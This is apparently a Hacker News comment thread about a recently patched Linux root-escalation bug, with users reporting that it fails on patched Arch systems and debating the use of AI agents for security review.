It does not behave as described on EndeavorOS (arch-based) running kernel 6.19.14-arch1-1. I receive the error:<p>Password: su: Authentication token manipulation error<p>I'm guessing this means it's already patched?
yes, it was reported on march 23rd, patches on april 1.<p>you are reading about it now <i>because</i> it has been patched.
same result on my arch machine as well.
I'm impressed that such a serious problem popped up out of nowhere.<p>In my opinion, this mostly affects countries that are still using outdated systems, especially critical systems.<p>This gives bad actors a direct route to the root. Having an easily accessible root is not funny.
Yet, some people will still continue to say that "AI" isn't ready to replace (or strongly assist) our workflows, sure, some of the best humans devs left a vulnerability that serious <i>(It's extremely serious, so many container as a service are vulnerable)</i> for 9 years and an agent found it in 1 hour, maybe it's time to wake up and accept that it's UNSAFE to not use AI for security review as well?